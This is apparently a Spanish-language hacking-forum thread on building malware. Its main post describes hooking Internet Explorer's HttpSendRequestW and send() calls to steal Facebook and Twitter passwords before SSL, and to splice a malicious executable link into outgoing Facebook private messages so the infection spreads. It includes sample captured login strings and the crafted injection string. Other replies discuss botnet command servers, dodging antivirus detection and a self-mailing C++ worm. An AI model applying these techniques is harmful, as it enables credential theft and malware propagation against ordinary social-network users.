Mensajes

Bueno,, como ya sabrán algunos, la mayoría del hosting gratuito no ofrece sql remoto, ni sockets en php,, entonces pensé,, bueno, de alguna forma se tiene que poder! Si Zeus puede, yo también :p

  Las C&C de la mayoria de botneta estan en hosting de pago  .. o un sitio web infectado, tambien necesita un dominio pago aunque a los pocos meses este en las blacklist te revienten el dominio y ni los spyders de google te visiten  ....

  La C&C se podria programar en php y montar en un servidor apache con php y sql.

  El cliente se puede programar  con las apis wininet pero deberas buscar la manera de engañar a los AV por que el uso de estas apis generan firmas en el ejecutable que las detectan la mayoria de los AV.. eso si quieres estudiar el tema y a modo didactico .... Saludos.

 200 Bs o 7$ cuesta el plan de datos mas caro de movilnet prepago ...

Estoy realizando una criatura en C++ al cual le agregue un motor SMTP pero cuando trata de reenviarse por correo el host destino corta la conexion. dentro del codigo tiene terra.es, yahoo.es, Starmedia.es algun guru me puede decir como realizar una conexion SMTP exitosa desde mi programa indicandome a que servidores debo conectar mi programa .

XD 

  Se ve muy bonito lo malo es que es publico  dentro de un año va ha tener mas firmas que el biefrost   

  Voz crees que eres un dios y eres un mortal   XD conozco gente que son ases de programacion, y terminaron okupando botnets rusas  mas que un post parece una de esos carteles que cuelga Al Qaeda cuando hacen algo malo  que la arrogancia no ponga limites en tu aprendizaje es tu deber joven padawan 

  Son Mensajes Personales  enviados desde el mismo Facebook lo que he planteado es interceptar estos mensajes desde la misma interfaz de facebook y añadirles un trozo malicioso ..... !No entiendo lo de los correos¡  ...


  El link que colocaste esta Super Gracias .... 

 Hombre si funciona lo probe en IEXPLORER 6 y 8 y funca ......

Enviando un mensaje:



Luego me logie en la otra cuenta y mire



Ahora una cosa es pinchar una cadena al mensaje y otra muy diferente es meter una URL Fakebook filtra las url y si son sospechozas simplemente no envia el mensaje y aparece un feo cartel diciendo que el mensaje ha sido denunciado como ilegal ... .... Esto para el que quiere meter una URL con lycos u algun dominio NO-IP simplemente no se puede enviar pero se me ocurrio que se puede crear un blog y alli alojar la URL con bastante ingenieria social ..... y spradear la url del Blog ... asi funciona, waledac y koobface hacen algo similar ellos te direccionan por varios sitios hasta infectarte .... .....

A la tarde te envio el source por MP esta algo cutre pero funciona .... Asi le hechas un vistazo en el momento de cerrar IEXPLORER aparecen unas feas exepciones 

  Pues me alegro que les haya gustado ya logre interceptar myspace y mi red social favorita: "TAGGED" es de pago pero es super   con myspace hay que parcear con precision de cirujano por que el mensaje esta en el medio de la cadena enviada por send ....... Mañana subo el concepto .....   y el lunes voy con firefox   ........


  Saludos .....  

 PD: Al parecer lo unico que pasan por las ssl son las credenciales  

  Bueno me decidi husmear en las reds sociales y empece con facebook logrando algo....  

 En muchos sitios por alli sobre todo en el blog de YST lei que para intercalar MP en Facebook habria que hookear apis de wininet y  en cierto grado es verdad, si hookeamos la api HttpSendRequestW en IExplorer podemos interceptar las credenciales del facebook antes de pasar por las ssl en el cuarto parametro de la API:

Código [Seleccionar] Expandir

BOOL HttpSendRequest(
 HINTERNET hRequest,
 LPCTSTR lpszHeaders,
 DWORD dwHeadersLength,
 LPVOID lpOptional,
 DWORD dwOptionalLength
);


 Obtenemos una cadena como esta:

Código [Seleccionar] Expandir

charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&lsd=CLE74&return_session=0&legacy_return=1&display=&session_key_only=0&trynum=1&charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&lsd=CLE74&email=algunloco@hotmail.com&pass=algunpass&persistent=1&login=EntrarÜ
†
µ

 podemos filtrar esta cadena en el hook buscando señas como "charset_test=" y "email=" y guardarla en un archivo o enviarlas directamente por sockets ..  

 Pero este no es mi objetivo mi fin es lograr intercalar una URL maliciosa en un MP   .......

 Por lo que despues de debbugear y hookear varias apis de wininet decidi hacerlo a la Chuck Norris: "HOOKEANDO SEND" .....   ....

 En el momento de enviar un MP por el fakebook   IExplorer realiza un send enviando una cadena como esta:

 

Código [Seleccionar] Expandir

status=hola%20mundo&action=send_reply&home_tab_id=1&profile_id=100000155542630&target_id=0&app_id=&&composer_id=c4ce5f8ca5612e1419225556&hey_kid_im_a_composer=true&thread=1304306924347&msg_id&post_form_id=1c94d03e13c7811d1d4bc3f3c9faf420&fb_dtsg=-wA4J&lsd&_log_action=send_reply&_log_thread=1304306924347&_log_msg_id&ajax_log=1&post_form_id_source=AsyncRequestPOST /logout.php HTTP/1.1

 Como veran despues de status= esta el mensaje con unos feos %20 que sustituyen los espacios si queremos intercalar algun mensaje tendriamos que crear un buffer asi:

Código [Seleccionar] Expandir

status=Feliz%20dia%20de%20san%20Valentin%20http:\\lamerruso.com\\mibicho.exe%20

y le concatenamos la cadena original desde &action= quedando algo asi ....

Código [Seleccionar] Expandir

status=Feliz%20dia%20de%20san%20Valentin%20hola%20mundo&action=send_reply&home_tab_id=1&profile_id=100000155542630&target_id=0&app_id=&&composer_id=c4ce5f8ca5612e1419225556&hey_kid_im_a_composer=true&thread=1304306924347&msg_id&post_form_id=1c94d03e13c7811d1d4bc3f3c9faf420&fb_dtsg=-wA4J&lsd&_log_action=send_reply&_log_thread=1304306924347&_log_msg_id&ajax_log=1&post_form_id_source=AsyncRequestPOST /logout.php HTTP/1.1

 Y al enviar la cadena lleva la URL intercalada   .........

 Con Twetter estaba probando algo con el hook a la api HttpSendRequestW se puede obtener las credenciales filtrando una cadena como esta:

 

Código [Seleccionar] Expandir

authenticity_token=3c2e284418861cb85cb6994e3c1c1c3259fe1a7f&authenticity_token=3c2e284418861cb85cb6994e3c1c1c3259fe1a7f&return_to_ssl=&redirect_after_login=&session%5Busername_or_email%5D=twettermaniaco@hotmail.com&session%5Bpassword%5D=semeolvido&commit=Iniciar+Sesi%C3%B3n˜Úª

 se puede filtrar buscando señas y como veran alli estan las credenciales antes de pasar por las ssl   .........

 Iva a intentar intercalar twets maliciosos pero por alguna extraña razon la pagina de twetter tiene problemas   ......


 PD: No subo source aqui esta la idea   no quiero que algun "experto" propague malware asi no mas sin esforzarce XD  


 Saludos..  

 Cura Gozon  eso e sque le estaba dando la bendicion